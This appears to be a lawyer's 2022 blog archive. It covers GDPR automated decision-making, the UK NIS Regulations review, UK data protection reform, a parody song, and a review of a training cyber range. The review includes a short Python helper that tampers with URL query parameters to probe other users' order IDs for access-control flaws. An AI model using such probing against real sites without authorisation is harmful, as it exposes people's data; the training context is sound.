Mastodon Kuan0: 2022

Sunday 16 October 2022

Automated Decision Making (ADM) & GDPR - Flowchart

ADM under GDPR - I produced this flowchart after noticing that my Imperial AI MSc students were struggling to parse Art.22. Admittedly it's been termed the worst-drafted of all GDPR provisions, rightly, by someone I used to work with, who knows who she is :) I hope it will be useful, and as always all comments are welcome!
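The Art.22 analysis that the flowchart walks through can also be sketched in code. This is my own simplified rendering, not the flowchart itself: the function and parameter names are hypothetical, and real Art.22 analysis involves far more nuance (e.g. what counts as "solely" automated, or "similarly significant" effects).

```python
# Hypothetical sketch of the GDPR Art.22 decision logic.
# All names are illustrative, not taken from the flowchart or the GDPR text.

def art22_analysis(solely_automated: bool,
                   legal_or_similarly_significant_effect: bool,
                   necessary_for_contract: bool = False,
                   authorised_by_law: bool = False,
                   explicit_consent: bool = False) -> str:
    # Art.22(1): only decisions based solely on automated processing
    # (including profiling) that produce legal effects, or similarly
    # significantly affect the data subject, are in scope.
    if not (solely_automated and legal_or_similarly_significant_effect):
        return "Art.22 not engaged"
    # Art.22(2): exceptions permitting such decisions.
    if necessary_for_contract or explicit_consent:
        return ("Permitted, but Art.22(3) safeguards required "
                "(e.g. human intervention, right to contest)")
    if authorised_by_law:
        return "Permitted if the authorising law lays down suitable safeguards"
    # On the "general prohibition" reading of Art.22(1):
    return "Prohibited"
```

A sketch like this also shows why the drafting causes students trouble: whether Art.22(1) is a prohibition or a right to object is not answerable from the text alone.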

Saturday 9 July 2022

UK NIS Regulations: enforcement, & future

For both OESs and DSPs, the UK NIS Regulations have barely been enforced, but change is coming, including bringing MSPs within scope. (OESs are operators of essential services, basically critical infrastructure service providers, while DSPs are "digital service providers": only cloud computing service providers, online marketplaces and online search engines, not other providers of digital services in the broad sense.)

The Second Post-Implementation Review of the Network and Information Systems Regulations 2018 (PDF), 4 July 2022, revealed this and other interesting information:

  1. NIS incident reporting hasn't actually been happening: “…the system does not appear to be working. As of this review, competent authorities have received little-to-no reports, despite other sources of information, such as the Breaches Survey, indicating a prevalence of incidents within the wider economy and society.”

  2. NIS enforcement has been minimal; no NIS fines (penalty notices) have been imposed so far: 
    1. Only 2 competent authorities have enforced to date, which raises the question: "is the enforcement regime appropriate?" But, “NCSC has also been informed of one very successful instance of a competent authority carrying out enforcement, which had very positive outcomes, suggesting that the enforcement regime may be appropriate."
      1. Note: it's unclear if the UK ICO, which regulates DSPs under the NIS Regulations, was one of those two authorities.
    2. “…there is evidence from competent authorities to suggest that there are cases where enforcement activities were merited but no action was taken. The use of enforcement tools overall, is much lower than the reported need and so far competent authorities appear to have been less inclined to make use of their regulatory powers." Why, and why not? The reasons are not stated.
    3. "There is also a reported concern from regulators that the grounds for enforcement (either via enforcement notices or penalty notices) is not clear enough”…
    4. “NIS competent authorities... have additionally reported being very restrictive with their regulatory powers, relying more on regular engagements, inspections, and information notices rather than any binding provisions of the regulations, such as enforcement notices, civil proceedings, or penalty notices.”
    5. "Of those who felt the enforcement regime wasn't proportionate, 44% gave other reasons including there is no clear link between the fine levied and the actions that operator of essential services took prior to the incident and the fact that fines result in double jeopardy as there is already a cost relating to a cyber breach."
      1. Note: it's interesting that the double jeopardy cited was not the possibility of fines under both GDPR and NIS, which is the key double jeopardy risk in my view (to be addressed in the EU's NIS 2 Directive). The breach costs point is, of course, relevant to GDPR fines too, but is cited only sometimes (in conjunction with remediation costs) in GDPR supervisory authority decisions.
    6. The only relevant DSPs who indicated the enforcement regime was not proportionate to the risk of disruption reported feeling that the Regulations were incorrectly applied to DSP organisations in general. (I agree with this; see below.)
    7. DCMS will aim to collect annual data from the competent authorities e.g. the number of incidents per year, the number of independent audits of the Cyber Assessment Framework, the number of improvement plans as a result of the Cyber Assessment Framework, the number of information notices issued by the competent authorities, the number and nature of enforcement notices issued by competent authorities, and the number of organisations regulated by sector and also the number of SMEs regulated by sector.

  3. NIS Regs' Cyber Assessment Framework: this has allowed experts in competent authorities to review organisations' cyber security arrangements and ensure improvements are made. 67 known operators have received improvement plans (including updating legacy systems and software to reduce vulnerabilities), highlighting the Regulations' role in improving cyber security.
    1. Note: the reference was only to "operators". This suggests no DSPs were asked to make any improvements to their cybersecurity under NIS.

  4. NIS Regs generally: effective to drive good cyber security behaviours; "...strong indication that without NIS, cyber security improvements across essential services in the UK would proceed at a much slower pace. ...added benefit of covering a large number of sectors, which is expected to address some of the inconsistencies of managing risks to networks and information systems across sectors...". But, areas of improvement remain, thought to be most appropriately tackled through regulatory intervention, to strengthen and future-proof the regulatory framework.
    1. Other regulations or standards mentioned as drivers for improvements in cyber security included: the UK General Data Protection Regulation (UK GDPR) (13 or 86% of relevant digital service providers, 68 or 78% of operators of essential services); ISO27001 (28% of operators of essential services); Cyber Essentials and Cyber Essentials Plus (11% of operators of essential services); as well as other industry standards (33% of operators of essential services).

  5. Areas needing improvement, and future plans: Then-Minister Lopez's associated statement to Parliament on 4 July noted that recommended changes to the NIS Regs were included in the Department for Digital, Culture, Media & Sport's Jan 2022 consultation, Proposal for legislation to improve the UK’s cyber resilience (summarised in my LinkedIn post). The outcome of that consultation is to be published "later this year", i.e. later in 2022. Recent UK political events, including her resignation on 6 July, may of course delay the initially-planned timescale. The key areas are:

    1. DSP registration and guidance: 54% of responding DSPs stated it was not easy to identify whether their organisations are in scope (this deters registration, and the ICO won't be aware of their activities to advise them!).
      1. "Further work is required to ensure that the guidance makes it easy to identify whether firms are in or out of scope of the Regulations and to ensure that organisations that need to be included in the regulations are designated."
      2. "Registration of digital service providers cannot be left to digital service providers alone... The Government will continue to support the ICO in the work it is already carrying out to identify firms that should be under the Regulations and support them in notifying those organisations of their responsibilities. Both the government and the Information Commissioner, should consider ways to increase awareness of the NIS Regulations with all potential digital service providers." The government should consider options to provide the Information Commissioner with increased information-seeking powers (similar to existing ones available to competent authorities of operators of essential services) to ascertain whether an organisation qualifies as a relevant DSP under the NIS Regulations.

    2. Ensuring the right sectors are caught: managed service providers (MSPs) are not caught currently, but under the Jan 22 consultation they will be. (For other subsectors discussed e.g. BPO, SIEM, analytics & AI, see my LinkedIn post, but it seems "While this Post-Implementation Review has not identified any other sectors that need to be included at this time, it has underlined a need for the government to maintain the powers to make such additions in the future.")

    3. Supply chain security: OESs can't monitor supply chains due to lack of supplier cooperation and lack of resources. Action is needed to increase operators’ ability to manage security risks arising from supply chains, particularly suppliers critical to provision of essential services.
      1. Proposed power to designate critical dependencies to identify, impose duties, and then regulate certain supply chain organisations that present systemic risks to OESs, due to their market concentration, reliance on those services, or other factors.
        1. Comment: could IaaS/PaaS, perhaps even some SaaS providers, be caught both as DSP and as critical dependency? - highest common denominator of compliance required there. Also, could IaaS/PaaS providers that are critical enough, simply be designated as OESs themselves (legislative rules permitting)?
      2. DCMS will consider options such as amending guidance to tackle supply chain security concerns, including using standards and certification, such as Cyber Essentials and Cyber Essentials +, to address this issue. But cross-government consultation is needed.
      3. Note: see also the Government response to the call for views on supply chain cyber security, Nov 2021.

    4. Capability & capacity of OESs, DSPs and competent authorities: lack of finance/funding or of general resources. This is more variable among authorities, particularly the lack of cyber-regulator-specific training or centralised NIS training (as opposed to GDPR training). Competent authorities also need more resources for effective enforcement. On authorities' resources:
      1. DCMS will "commit to persuading those departments to ensure that they meet their legal obligations to fund their NIS oversight. For these, plus those regulators that are not central government departments, DCMS aims to ensure that competent authorities are able to recover the costs of regulation from those being regulated, in line with government policy."
      2. Additional ways to improve resource-efficiency will be considered, e.g. promoting collaboration across authorities and with non-NIS authorities such as banking and financial services regulators (for designation of critical dependencies), exploring existing frameworks like CBEST and TBEST to test assumptions and highlight areas for further development.

    5. Incident reporting: thresholds (in statutory guidance) are too high, and the base criterion for a reportable incident is too narrow (disruption to the service, cf. impact on NIS) to capture the highest-risk incidents. To ensure that the right incidents are captured:
      1. Authorities should review reporting thresholds and lower if necessary.
      2. OESs and DSPs will be required to report all incidents that have a material impact on the confidentiality, integrity, and availability of NIS [note: the well known CIA triad], and [note: I think "or" is intended here?] that have a potential impact on service continuity.

    6. Enforcement: DCMS needs to conduct work to assess why the enforcement regime is not being utilised where it is merited.

    7. Consistency and more robust oversight: greater consistency in regulatory implementation across sectors is required, alongside creation of performance metrics to better measure the impact and effectiveness of the Regulations.
      1. DCMS should issue revised and updated guidance to competent authorities, setting out the requirement for a common approach to assessment and performance indicators; explore ways to make such guidance more binding on authorities; and establish a process by which competent authorities report against performance indicators and are held accountable for their performance (indicators could be linked to the delivery of the National Cyber Strategy and its performance framework). 
Note also the related consultation on Data storage and processing infrastructure security and resilience - call for views (press release), including data centre infrastructure, cloud platform infrastructure and MSP infrastructure, which expires at the end of Sunday 24 July 2022.
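The proposed reporting test in point 5 above (material impact on the confidentiality, integrity or availability of NIS, or a potential impact on service continuity) could be sketched as a simple boolean check. This is purely illustrative: the parameter names are mine, and what counts as "material" would have to come from statutory guidance.

```python
# Illustrative sketch of the proposed NIS incident-reporting test.
# "Material" thresholds would be set by statutory guidance; these
# boolean inputs are a hypothetical simplification.

def reportable(material_confidentiality_impact: bool,
               material_integrity_impact: bool,
               material_availability_impact: bool,
               potential_service_continuity_impact: bool) -> bool:
    # Proposed test: material impact on the C, I or A of network and
    # information systems (reading the "and" in the text as "or"),
    # or a potential impact on service continuity.
    material_cia_impact = (material_confidentiality_impact
                           or material_integrity_impact
                           or material_availability_impact)
    return material_cia_impact or potential_service_continuity_impact
```

Even in this toy form, the breadth of the test is visible: any one material CIA impact triggers reporting, which is exactly why a flood of reports is a risk if "material" isn't defined carefully.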

The next UK NIS Regulations review isn't due for another 5 years.


Below are my personal views only, but they're based on my practical experience of advising clients on the UK NIS Regulations and EU NIS Directive: both their legal and technical/security teams.
  • Incident reporting:
    • "There is a lot of uncertainty around the incident response, and which incidents need to be reported...". In my view, this uncertainty is a contributing factor, and guidance is sorely needed, alongside the planned steps mentioned above regarding lowering reporting thresholds and requiring reporting of incidents materially affecting NIS CIA even if not affecting the service.
    • However, there's a risk of a tsunami of reports that regulators may not be able to cope with, if every incident "materially" impacting C, I or A has to be notified. It's important to bear this factor in mind when setting the reporting test/thresholds. Again, guidance on "materiality" will be vital.
  • Awareness, scope, DSPs and non-registration: I hope the government will take the opportunity, post-Brexit, to reconsider the scope of the NIS Regulations beyond just bringing MSPs into scope. In particular, please consider whether and to what extent SaaS providers should be caught by the NIS Regulations.
    • The NIS Regulations were binding from 10 May 2018. Guess what else there was in May 2018? Yep, the GDPR. No surprises then that most organisations focused their resources on GDPR rather than NIS compliance, especially with the huge publicity about GDPR fines and hardly anything being said about NIS.
    • It's understandable that IaaS/PaaS providers should be subject to the Regulations as DSPs, because many organisations build their own technology infrastructure or customer-facing services on top of those cloud services. I.e., many organisations create their own SaaS services based on third party IaaS/PaaS services, which do constitute technology infrastructure-type services.
    • However, automatically and unthinkingly copying out the NIST definition of cloud computing is not the right approach here. Applying NIS laws to SaaS is like applying certain laws to "all websites" when they should actually apply to "website hosting platforms/services". SaaS involves the provision of specific applications or services to end users (like a word processing application online, instead of via an application installed on a local computer). Those applications/services can vary hugely in their scope and purpose. The applicability of NIS requirements ought to depend on the specific type of application/service and its importance to the economy or society (e.g. is the service critical to the provision of an OES's essential service?) - and not just because of its general nature as SaaS. Currently, all SaaS services are technically caught, whether they're used for bill payments or as a forum for pet lovers to discuss their animals. To me, that doesn't seem to make sense.
    • As I've previously pointed out, SaaS providers don't always register with the ICO for various reasons.
      • Registering puts their heads firmly above the parapet for possible enforcement. Especially as, since Jan 2021, the top £17m tier of fines could be imposed based on serious service outages alone, whereas previously the top tier only applied if the service was important to the economy. If I provided a SaaS service for pet lovers' discussions, which no one could think would harm the economy or society if it went down, I wouldn't want to register and make my service known to the ICO either.
      • Saying that SaaS services are caught "only to the extent that they provide a scalable and elastic pool of resources to the customer" just parrots the definition without providing any useful guidance. All cloud services are, by definition, meant to be scalable and elastic. They're not infinitely scalable or elastic, of course; even IaaS/PaaS services impose practical commercial limits on customers' usage, so SaaS services' lack of infinite scalability/elasticity should be a non-point too. But some SaaS providers do argue they're not caught because their service doesn't enable access to a "scalable" and "flexible" pool of shareable computing resources. I have some sympathy here, not because the services really aren't scalable/flexible, but because (as above), given the legislative objective of NIS laws, I feel that it's simply not sensible to try to catch all SaaS services just because they're SaaS, regardless of the exact nature of their services or customers served. Business models are increasingly moving to SaaS, away from software licensing: but there's no legal requirement to have security measures or report vulnerabilities or security issues affecting all software applications regardless of their nature (although many might think that would be sensible). And I've always thought it odd that flexible/scalable services are subject to NIS, when inflexible, non-scalable "classic" hosting platforms are not, even though with the latter their customers are more at risk from availability issues (due to their inflexibility and non-scalability!). Surely it should be the other way round?
      • And making all SaaS services register is akin to making all software application manufacturers/distributors register their software. The ICO receives fees from controllers who register for data protection purposes, so there's a benefit to the ICO from that registration. But is the benefit of finding out about all online software applications of whatever type or importance worth the administration and other costs?
      • Would introducing a fine for non-registration help? I don't think so, because of the underlying issue I've emphasised regarding the inappropriateness and disproportionality of bringing all SaaS services within scope regardless of their importance to society or the economy (and see later below).
      • In my experience, SaaS providers may register if they provide important services to operators. Otherwise, they tend to keep their heads down, and I don't blame them.
      • The lack of publicly-reported enforcement of the Regulations is another reason for relative lack of awareness of NIS. 
  • Capability and enforcement
    • Certainly as regards DSPs, I've found that many ICO staff aren't familiar with NIS and need NIS training as well as more NIS resources, e.g. those staffing the helpline number given on the ICO's NIS webpage. As flagged above, some DSPs consider the Regulations were incorrectly applied to DSPs in general, and I agree, possibly because of awareness and/or knowledge issues.
    • The reluctance of many SaaS providers to register, never mind report incidents, is fuelled by the factors I've outlined above, and fear of being subject to the maximum possible fine even though their service may be of minor importance to society or the economy. If they have to bear the costs of ICO investigations too, as is planned, that may drive even more SaaS providers to decide not to register. 
    • The bigger risks for non-registering DSPs are monetary penalties for not reporting incidents when they should have, and/or not having the appropriate security measures in place. If they haven't registered and haven't notified incidents, that of course reduces those risks, because the ICO won't know about them! The main risk then is if they report a personal data breach under GDPR and the ICO says, "Aha! We will fine you under NIS too, because you should have reported the incident under NIS!". But, this depends on the ICO's NIS and GDPR enforcement divisions being sufficiently joined up and also trained up (again, the skills/knowledge issue flagged earlier).
  • Summary: personally, I would recommend:
    • Reconsidering the extent to which SaaS providers should be in scope under NIS, if at all. For example, consider introducing specific thresholds or criteria for SaaS providers to be in scope. (Obviously, if they are critical suppliers to OESs, or OESs themselves, they should be caught under those proposed changes and be exposed to possible designation as OESs, but that's a separate matter.)
    • Reconsidering the extent to which SaaS providers should be subject to the different tiers of NIS monetary penalties or other enforcement, if at all (with the same caveat). Again, consider if different types/tiers of fines or other enforcement should be applicable to SaaS providers or indeed DSPs that aren't OESs or critical suppliers.
    • These would help save the ICO's resources too, so they can be directed towards IaaS/PaaS and truly important SaaS providers.
    • If less radical changes are to be made, provide much clearer guidance on if/when SaaS providers will be caught by the Regulations and therefore need to register with the ICO.
    • Making publicly available the annual data DCMS aims to collect from regulators, particularly enforcement information and levels of fines imposed. This would help to raise awareness and incentivise compliance.
    • Requiring the ICO and other regulators to publish the full text of their NIS enforcement and monetary penalty etc notices, but redacted as necessary (including as to OES/DSP names), ideally also listing and linking to them on a centrally-maintained webpage of NIS enforcement action. That would also help raise awareness and incentivise compliance.

Saturday 25 June 2022

"Old fingers": digital exclusion, accessibility

Song with a serious message: tablets, smartphones & other touchscreens have built-in accessibility & usability issues. This is a real problem, as we'll all get old eventually (& it's not just the elderly who may suffer from "zombie fingers"): see research; some user solutions are possible, but designing for lower skin conductivity would be ideal.

The lyrics below are original to me, but I don't provide any video of them being sung or indeed any backing music, to avoid any copyright issues (despite the parody exception). This seems to be the official YouTube video, so James Bond/Shirley Bassey fans please feel free to sing along!

Old fingers
Touchscreens weren’t designed for skin that’s dry
I want to cry!
Why?! my old fingers
Can’t control the same touchscreen anymore
Like once before?
And I press and I swipe all in vain
And I curse and I try it again
But a thousand times, won’t make a difference
It’s their **** design, conceived for
Young fingers
Supple skin, conducting the signals in
With no chagrin
You can press, you can swipe all in vain
You can curse and just try it again
Try a thousand times, won’t make a difference
It’s their **** design that beats my
Old fingers
Gaming gloves, or wet them, is what I’m told
Too bad you’re old
Can’t stop getting old
Getting old
We’ll be old
Who cares ‘bout the old
You'll be old
Just be old!

Friday 17 June 2022

UK data protection reform post-Brexit: key points summary

The UK government’s response to its data protection reform consultation is out (press release 17 June 2022).

Certain proposals will proceed under the Data Reform Bill announced in the 10 May 2022 Queen’s Speech (more info). Others won’t, while still others are to be considered further. The devil’s always in the detail, of course, so the proposed changes will be clearer when the Bill’s text is available – it's still unknown exactly when it’s to be published (updated: TechUK says the Bill will be laid "this summer to undergo several rounds of amendments before it is formally passed into legislation". So, presumably June/July before the August summer holidays).

Some highlights below.


Anonymisation

  1. The test will draw on Convention 108+ Explanatory Report para 19: “Data is to be considered as anonymous only as long as it is impossible to re-identify the data subject or if such re-identification would require unreasonable time, effort or resources, taking into consideration the available technology at the time of the processing and technological developments. Data that appears to be anonymous because it is not accompanied by any obvious identifying element may, nevertheless in particular cases (not requiring unreasonable time, effort or resources), permit the identification of an individual. This is the case, for example, where it is possible for the controller or any person to identify the individual through the combination of different types of data, such as physical, physiological, genetic, economic, or social data (combination of data on the age, sex, occupation, geolocation, family status, etc.). Where this is the case, the data may not be considered anonymous and is covered by the provisions of the Convention”.
  2. The test for anonymisation will be relative, i.e. will the individual remain identifiable by that controller, cf. a third party?

Artificial intelligence (AI) & machine learning (ML), and ADM

  1. Anti-discrimination - the UK DPA sch1 para8 exemption allowing processing of special category data and criminal offence-related data for equality of opportunity or treatment will be expanded to allow bias monitoring, detection and correction in AI systems.
  2. Fairness - the government will consider the role of UK GDPR “fairness” in wider AI governance in its forthcoming AI White Paper, but will not legislate here.
  3. Art.22 automated decision-making (ADM) - will be retained, but with clarified limits & scope, recasting Art.22 as a right to specific safeguards rather than a general prohibition on solely automated decision-making. The approach to ADM will be aligned with the broader approach to governing AI-powered ADM, which will be addressed as part of the upcoming UK White Paper on AI governance.
  4. Explainability and intelligibility of AI-powered ADM, including the role of DP legislation in that context, will be considered in the White Paper on AI governance.
  5. See also purpose limitation, below.


Accountability

  1. Organisations must have a privacy management programme.
  2. No need for a DPO, but organisations must designate a suitable individual to oversee data protection compliance.
  3. No more data protection impact assessments (DPIAs), or requirement for records of processing activities (ROPAs) as such.
  4. Controllers must have simple, transparent complaint-handling processes for data subjects (but retaining a clear pathway to complain to the ICO).

Legal basis - legitimate interests

  1. No balancing test will be needed for a limited number of carefully-defined processing activities in the clear public interest based on legitimate interests, likely to include processing undertaken by controllers to prevent crime, to report safeguarding concerns, or where necessary for other important reasons of public interest (the government will consider if any additional safeguards are needed for children’s data). Hopefully this should “encourage organisations to make the authorities aware of individuals who are at risk without delay”, including children and other vulnerable groups with protected characteristics. However, core principles like lawfulness, fairness & transparency, and further conditions for processing special category data, etc., would of course continue to apply.
  2. Power to update the list of activities, subject to Parliamentary scrutiny.

Special category data, criminal offence-related data

The UK DPA 2018 sch1 part 2 exemptions for processing in the substantial public interest could be expanded to add certain activities, but “substantial public interest” will not be defined specifically.

Purpose limitation

  1. Further processing or reuse by the same controller for incompatible purposes will be permitted “when based on a law that safeguards important public interest”, with “greater clarification on the rules and permissions of data re-use and the need for greater transparency”. 
  2. On consent-based processing, “further processing cannot take place when the original legal basis is consent other than in very limited circumstances”. We’ll have to wait to see what those new circumstances will be.
  3. Distinctions between further processing and new processing by a different controller to be clarified.


International data transfers

  1. Adequacy decisions - a risk-based approach will be taken; judicial or administrative redress are both acceptable. There will be ongoing review, cf. the GDPR's 4-yearly review of adequacy decisions.
  2. The Secretary of State can recognise alternative transfer mechanisms (ATMs).
  3. (But no repetitive derogations or reverse transfers etc.)


Data subject access requests (DSARs)

  1. No nominal fee to be introduced.
  2. No cost ceiling, but controllers can refuse to deal with DSARs that are “vexatious or excessive” (cf. the current “manifestly unfounded or excessive”).


Research

  1. No new lawful basis for research, but various changes will be made to assist and promote research.
  2. E.g. a “scientific research” definition (hopefully making crystal clear the position on commercial scientific research, and what counts as research in the “public interest”); and clarifying that broad consent is possible and can be relied on.
  3. Privacy notices - the UK GDPR's Article 14(5)(b) “disproportionate effort” exemption will be replicated, but only for research purposes: personal data used for a research purpose differing from the original purpose will be exempt from the Article 13(3) re-provision of information, but controllers who obtain personal data directly from data subjects will still have to provide the required Article 13(1) & (2) information on collection. “Disproportionate effort” will be clarified by bringing the GDPR's Rec.62 language into the operative text.

ePrivacy under PECR

  1. Fines - to be increased to GDPR levels.
  2. ICO powers - to include assessment notices etc.
  3. Cookies and similar technologies (covering mobile apps and smart devices too)
    1. Analytics will be considered “strictly necessary”.
    2. Consent to be unnecessary in more situations: "a small number of other non-intrusive purposes" (e.g. website fault detection?), "where the controller can demonstrate legitimate interest for processing the data".
    3. Websites must respect users’ browser preferences; the UK will move to no cookie banners for UK residents and an opt-out model for cookies once preferences management technology is widely available.
  4. Direct marketing
    1. Soft opt-in to be extended to political parties and non-commercial organisations like NGOs/charities. 
  5. Nuisance phone calls e.g. automated telephone marketing 
    1. The ICO will be able to take enforcement action against organisations based on the number of calls generated (cf. currently, only the number of calls that are connected)
    2. Communications service providers must report to the ICO “suspicious levels of traffic on their networks”.
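The "respect users' browser preferences" point above implies a server-side check of a preference signal. The proposal doesn't specify a mechanism, so the sketch below is purely hypothetical, borrowing the Global Privacy Control "Sec-GPC" header as an example of an existing preference signal.

```python
# Hypothetical sketch of an opt-out cookie model driven by a browser
# preference signal. The UK proposal names no mechanism; the GPC-style
# "Sec-GPC" header is used here only as an illustrative assumption.

def may_set_non_essential_cookies(request_headers: dict) -> bool:
    # Opt-out model: non-essential cookies are permitted by default,
    # unless the user's browser signals an objection ("Sec-GPC: 1").
    return request_headers.get("Sec-GPC") != "1"
```

Under an opt-out model like this, the default flips compared to PECR's current consent (opt-in) rule, which is why the proposal conditions the change on preference-management technology being widely available first.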


ICO reform

  1. New duties (e.g. to uphold data rights and to encourage trustworthy and responsible data use; to have regard to economic growth and innovation, competition issues and public safety; and to consult with relevant regulators and any other relevant bodies).
  2. Structural changes e.g. independent Board and Chief Executive.
  3. New powers for the DCMS Secretary of State, e.g. to prepare a statement of strategic priorities which the ICO must respond to; to approve statutory codes of practice and statutory guidance ahead of laying them in Parliament.
  4. Legislative criteria for a more risk-based proportionate approach to complaints - ICO discretion to decide when/how to investigate complaints, including discretion not to investigate vexatious complaints, and complaints where the complainant has not first attempted to resolve the issue with the relevant data controller. "This will empower the ICO to exercise its discretion with confidence."
  5. New ICO powers
    1. To issue technical report notices where fair and reasonable, having regard to alternative investigatory tools, relevant knowledge and expertise available to the controller or processor and the impact of the cost of producing the report.
    2. To compel witness interviews, without interfering with the right not to self-incriminate, rights to legal professional privilege and various procedural mechanisms to ensure proportionality & fairness of interview.
  6. The ICO must provide organisations with the expected timeline at the start of all investigations.

Note: on ICO resources and funding, the ICO announced on 14 June 2022 its agreement with its sponsor department, the Department for Digital, Culture, Media & Sport (DCMS), and with the Treasury (HMT), that the ICO will now be able to retain some of the funds paid as a result of its civil monetary penalties (i.e. fines) to cover pre-agreed, specific and externally audited litigation costs. (Previously, all fines money went to the UK government’s central Consolidated Fund.)

Sunday 10 April 2022

Security training - review of Security Innovation's Cmd+Ctrl Shred cyber range & security training

GDPR supervisory authorities (SAs) emphasise data protection training (e.g. the UK Information Commissioner's personal data breach notification form asks, "Had the staff member involved in this breach received data protection training in the last two years?", and "Please describe the data protection training you provide, including an outline of training content and frequency").

What about security? Security of personal data is of course important under GDPR, and organisations can be fined for not having appropriate security measures in place. While security training for developers is not specifically mentioned in GDPR as such, developers do also need training on application security issues that can lead to breaches of websites, online services and any databases or other data storage behind them (including any personal data those systems hold). Most IT staff, developers or otherwise, are not necessarily cyber security (or even security) experts, and must be educated on what to look for and how to address at least the most common security issues.

Many online training courses on cybersecurity for developers are now available. There are also "cyber ranges" offering users deliberately vulnerable systems, websites or online applications that users can attack and seek to exploit, to learn how hackers think and the kinds of actions they take, and so be better able to defend against them. 

As part of OWASP London CTF 2021, in Nov 2021 Security Innovation generously offered participants free access for a month to a fake e-commerce website "Shred Skateboards" on its Cmd+Ctrl CTF (Capture the Flag) web application cyber range, and for 6 weeks to its Bootcamp Learning Path, a self-paced online training course incorporating 32 selected courses from its full catalog.

This blog reviews the Shred range, then the online training courses. These cover some of the issues referenced in the recently-finalised European Data Protection Board (EDPB) Guidelines 01/2021 on Examples regarding Personal Data Breach Notification, as those Guidelines include some recommended security measures as well as breach notification, and also mention OWASP for secure web application development. 

Cmd+Ctrl Ranges and Shred

Cmd+Ctrl's ranges are generally available only to paying organisations to train their staff (but not to paying individuals, sadly. Missed trick there, as I think individuals wanting to improve their ethical hacking skills would pay a reasonable fee or sub for access). People who signed up for the event were however given free access to Shred for a month. Shred is meant to be one of the easy ranges.

The Cmd+Ctrl login page provides some sensible disclaimers and warnings: 

After logging in, you need to click on the relevant range's name and wait a few minutes for it to start up (each user gets their own virtual machine, hosted I suspect on Amazon Web Services) as a real website available on the Internet with its own URL - hence the exhortation not to enter sensitive information on the website. I would expand that to real names, real email addresses and basically any real personal data, because real hackers can access that website just as much as you can!

Then, basically, explore the website and try different things to find vulnerabilities, e.g. click the links, register user accounts, try different URLs, enter different things into the search or login forms, etc. I won't share screenshots of Shred so as not to give anything away, but it emulates an online shop for skateboards and related accessories, with user accounts that can store user details including payment cards, the ability to purchase gift cards, etc. Each machine stays up for, I believe, 48 hours, and each time you start it, it may have a different URL and IP address. If things go badly wrong you may have to reset the database (which loses your changes, e.g. a fake user you registered) or even do a full reset, but you're not penalised for that; the system retains the record of scores you achieved for previous exploits. 
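Much of that manual probing can be expressed in a few lines of code. Here's a minimal sketch of the query-parameter tampering idea (the URL and parameter names are hypothetical, not Shred's real endpoints), using only Python's standard library:

```python
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

def tamper_query_param(url: str, param: str, new_value) -> str:
    """Return a copy of `url` with one query parameter replaced.

    Testers generate URLs like these to check whether the server
    enforces authorisation on the object the parameter refers to
    (an insecure direct object reference, or IDOR, check).
    """
    parts = urlparse(url)
    query = parse_qs(parts.query)
    query[param] = [str(new_value)]
    return urlunparse(parts._replace(query=urlencode(query, doseq=True)))

# Hypothetical shop URL: probe the order IDs adjacent to your own.
base = "https://shop.example/orders/view?order_id=1042&format=html"
candidates = [tamper_query_param(base, "order_id", i) for i in range(1040, 1045)]
```

On a real engagement you would then request each candidate URL (while logged in as an ordinary user) and check whether the server hands back someone else's order.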

When you successfully exploit a vulnerability, a banner slides in from the top of the webpage indicating what challenge was solved and how many points you gained for it. You can also see what broad types of other challenges remain unsolved. 

Via the My Stats link, you can see a Challenges page, which also gives similar broad information about the types of challenges remaining unsolved. Unfortunately, only Category information was provided regarding unsolved challenges (see the Category column of the Solved table shown below for examples). 

No detailed information about the exact nature of any challenge (i.e. the info under the Challenge column, such as "Unsafe File Upload" in the table above) was provided; it appeared only after you actually solved the challenge, whereupon it was listed in the Solved table (as well as the banner appearing). The "Get Hints" link was disabled for this event - but presumably hints are available in the paid versions of the ranges. However, Security Innovation provided a live online introduction on the first day of the CTF event, access to a one-page basic cheat sheet tutorial with a guide to Burp Proxy for intercepting HTTP traffic, and weekly emails with some hints and links to helpful videos. A chat icon at the bottom right of every webpage allowed the user to ask questions of support staff. I tried to confine my range attempts to the afternoon/evening given that Cmd+Ctrl is US-based, but I was very impressed with how quickly responses were given to my chat queries, even though I was using the range as an unpaid user. The support staff did not give away any answers, but instead provided some hints, often very cryptic - I suspect similar to the tips that users for whom the "Get Hints" link is enabled would receive. 

Under My Stats there was also a Report Card link giving detailed information about your performance, also in comparison to others who had attempted the range, including the maximum score reached. Challenges were again shown here, broken down by category and percentage solved. 

 As well as repeating the solved challenges table further down on this page, there's also a time-based view of the user's stats. As you'll see, I had a go over the first weekend, solving a few basic and easy challenges, then left it until I realised that I would lose access to Shred soon, so I made a concerted effort over the last few days though I ran out of energy with an hour or two to spare!


I was rather chuffed that, as a mere lawyer and not a cybersecurity professional, I managed to complete 25 out of the 35 challenges and reach rank 7 out of the 54 people who at least attempted Shred (in the screenshots below I've redacted names and handles other than common ones like Mark or David). I admit I have attended some pen testing training: one excellent 2-day course with renowned web security expert Troy Hunt (yes, I was very lucky), and one terrible week-long course with someone whose name should never be mentioned again (but at least the food was great). However, those courses were several years ago, and this is the first time that I've attempted a range or CTF event. (I've signed up for other services with some similarities, Hack the Box and RangeForce Community Edition, but I haven't had time to try them properly yet.)


Prerequisites for trying these ranges

You do need some prior knowledge, particularly about HTML and how URLs, query parameters and web forms work, HTTP, cookies, databases and SQL, etc., and concepts like base64 encoding and hashes. You also have to know how to use tools like the developer tools built into Chrome to edit Shred webpages' HTML. I'd not used those developer tools before tackling Shred, but searched online for how (I didn't resort to Burp for Shred, myself). I probably have a better foundation than most tech lawyers, as I have computing science degrees as well as the pen testing training, coupled with a deep and abiding interest in computing and security since my childhood days. So I'd strongly recommend that those without such a foundation take the courses before attempting any ranges (the courses are covered in more detail below).
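As a taste of the foundation meant here, a short Python sketch of two of those concepts: base64 is a reversible encoding (it hides nothing), while a hash is a one-way digest:

```python
import base64
import hashlib

secret = b"admin:hunter2"

# Base64 is encoding, not encryption: anyone can reverse it, which is
# why base64'd credentials in cookies or headers are trivial to read.
encoded = base64.b64encode(secret)
assert base64.b64decode(encoded) == secret  # round-trips perfectly

# A hash is one-way: the same input always yields the same digest,
# but the digest cannot be "decoded" back into the input.
digest = hashlib.sha256(secret).hexdigest()

print(encoded.decode())  # YWRtaW46aHVudGVyMg==
print(len(digest))       # 64 hex characters for SHA-256
```

Spotting base64'd or hashed values in cookies, hidden form fields and URLs - and knowing which of the two you're looking at - comes up constantly in these ranges.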


